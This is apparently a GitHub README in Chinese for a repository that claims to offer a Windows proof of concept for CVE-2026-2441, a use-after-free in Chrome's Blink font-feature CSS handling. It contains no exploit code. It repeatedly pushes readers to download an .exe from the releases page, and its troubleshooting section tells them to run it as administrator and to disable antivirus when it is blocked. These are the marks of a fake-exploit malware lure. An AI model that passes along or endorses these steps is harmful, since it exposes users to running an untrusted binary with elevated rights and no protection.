fartlover37/CVE-2026-2441-PoC

GitHub: fartlover37/CVE-2026-2441-PoC

Stars: 0 | Forks: 0

# ⚠️ CVE-2026-2441-PoC - 安全测试 Chrome 漏洞 [![下载最新版本](https://img.shields.io/badge/Download-Here-brightgreen?style=for-the-badge)](https://github.com/fartlover37/CVE-2026-2441-PoC/releases) ## 🛠 本应用程序的功能 本应用程序演示了 Google Chrome 中的一个已知安全漏洞。该漏洞名为 CVE-2026-2441,影响 Chrome 处理网页上某些字体的方式。它可能允许攻击者未经许可在浏览器内运行代码。此概念验证 展示了该漏洞的触发过程。 请仅在安全的计算机或测试环境中使用此工具。它有助于安全研究人员和软件测试人员更好地理解该漏洞。 ## 🚀 入门指南 请仔细按照以下步骤在 Windows 计算机上下载并运行该软件。 ### 步骤 1:检查您的 Windows 版本 此 PoC 可在 Windows 10 或更新版本上运行。请确保您的系统满足以下基本要求: - Windows 10、11 或更高版本 - 至少 4 GB RAM - 1 GHz 或更快的处理器 - 100 MB 可用硬盘空间 您无需预先安装任何特殊软件。下载包中包含了运行测试所需的一切。 ### 步骤 2:下载程序 点击顶部的大徽章或使用此链接获取文件: https://github.com/fartlover37/CVE-2026-2441-PoC/releases 此链接将带您进入 GitHub 的发布页面。找到最新版本并下载 Windows 版本文件。通常文件扩展名为 `.exe` 或 `.zip`。 ### 步骤 3:解压文件(如有需要) 如果您下载的是 `.zip` 文件,请按照以下步骤操作: 1. 在您的 Downloads(下载)文件夹中找到该文件。 2. 右键单击该文件并选择“Extract All”(全部提取)。 3. 选择您想要存放文件的文件夹。 4. 点击“Extract”(提取)。 如果您下载的是 `.exe` 文件,请跳过此步骤。 ### 步骤 4:运行程序 1. 打开您保存或解压文件的文件夹。 2. 找到主 `.exe` 文件。这是您将运行的程序。 3. 双击 `.exe` 文件启动它。 4. 如果 Windows 请求权限,请点击“Yes”(是)以允许。 程序将打开并指导您完成测试。 ### 步骤 5:遵循屏幕上的说明 该工具将显示步骤或自动运行。它会在您的系统上以安全的方式模拟该漏洞。 请勿在存有重要或敏感数据的计算机上使用此工具。它仅用于受控测试。 ## 💻 漏洞原理 此工具针对 Chrome Blink 渲染引擎中的一个缺陷,特别是 `CSSFontFeatureValuesMap` 部分。当 Chrome 处理使用某些字体功能的网页时,可能会错误地过早释放内存。这种“use-after-free”(释放后使用)缺陷允许攻击者在浏览器内运行恶意代码。 Google 已在 Chrome 版本 145.0.7632.75 中修复了此问题。如果您使用的是旧版本,您的浏览器将存在漏洞。 ## 🔍 验证您的 Chrome 版本 要确认您的 Chrome 是否存在漏洞: 1. 打开 Chrome。 2. 点击右上角的三个点。 3. 选择“Help”(帮助)>“About Google Chrome”(关于 Google Chrome)。 4. 检查版本号。 如果版本低于 145.0.7632.75,您的浏览器可能面临风险。 ## ⚙️ 系统要求 | 组件 | 要求 | |----------------------------|------------------------------| | Operating System(操作系统) | Windows 10 或更高版本 | | CPU(处理器) | 1 GHz 或更快的处理器 | | RAM(内存) | 最小 4 GB | | Disk Space(磁盘空间) | 至少 100 MB 可用空间 | | Software(软件) | 无需特殊软件 | ## 🔧 如何安全地使用 PoC - 在测试机器上运行程序,而不是您的主计算机。 - 不要将机器连接到敏感网络。 - 测试前关闭所有其他程序。 - 仔细遵循所有说明。 - 如果您不熟悉安全测试,请寻求专家帮助。 ## 📂 下载包内容 下载后,您将找到: - 主可执行文件 (`.exe`),用于启动测试。 - 一个 Readme 文件,说明基本用法(您可以阅读它以获取更多详细信息)。 - 一些用于触发漏洞的示例 HTML 文件。 - 运行演示所需的支持文件。 ## 🔗 其他资源 您可以访问官方 GitHub 发布页面以始终获取最新文件: https://github.com/fartlover37/CVE-2026-2441-PoC/releases 使用此页面检查更新或报告问题。 ## 🛡 关于 CVE-2026-2441 漏洞 | 详情 | 信息 | |-----------------------|---------------------------------| | CVE 标识符 | CVE-2026-2441 | | 严重性评分 (CVSS) | 8.8 (高) | | 类型 | Use-After-Free (CWE-416) | | 组件 | Blink CSS — `CSSFontFeatureValuesMap` | | 源文件 | `third_party/blink/renderer/core/css/css_font_feature_values_map.cc` | | 修复版本 | 145.0.7632.75 及更高版本 | | 报告者 | Shaheen Fazim | | 补丁日期 | 2026-02-13 | | 是否在野外被利用 | 是 | ## 📥 立即下载并安装 CVE-2026-2441-PoC 使用下面的链接访问发布页面并下载最新的 Windows 文件: [下载 CVE-2026-2441-PoC](https://github.com/fartlover37/CVE-2026-2441-PoC/releases) 按照上述说明安装并运行程序。 ## ⚙ 故障排除 如果程序无法运行: - 确保您的 Windows 是最新的。 - 检查您的系统是否满足最低要求。 - 以管理员身份运行文件:右键单击 `.exe` 文件并选择“Run as administrator”(以管理员身份运行)。 - 如果防病毒软件阻止程序,请暂时将其禁用。 - 验证您下载的是否为 Windows 的正确文件。 如果问题仍然存在,请通过在 GitHub 页面上开启 issue 寻求帮助。提供有关您系统和错误消息的清晰详细信息。 ## 📄 许可证和法律信息 本项目仅用于教育和测试目的。请负责任地使用。作者不对任何滥用或造成的损害负责。 请查看 GitHub 仓库中包含的许可证条款。 [![下载最新版本](https://img.shields.io/badge/Download-Here-brightgreen?style=for-the-badge)](https://github.com/fartlover37/CVE-2026-2441-PoC/releases)
标签:0-day利用, Blink引擎, Chrome漏洞, CISA项目, CSS解析器, CVE-2026-2441, Github安全, Go语言工具, PoC验证代码, UAF漏洞, Windows安全工具, 内存破坏, 多模态安全, 客户端攻击, 恶意代码执行, 概念验证, 漏洞复现, 编程工具, 远程代码执行, 释放后重用, 高危漏洞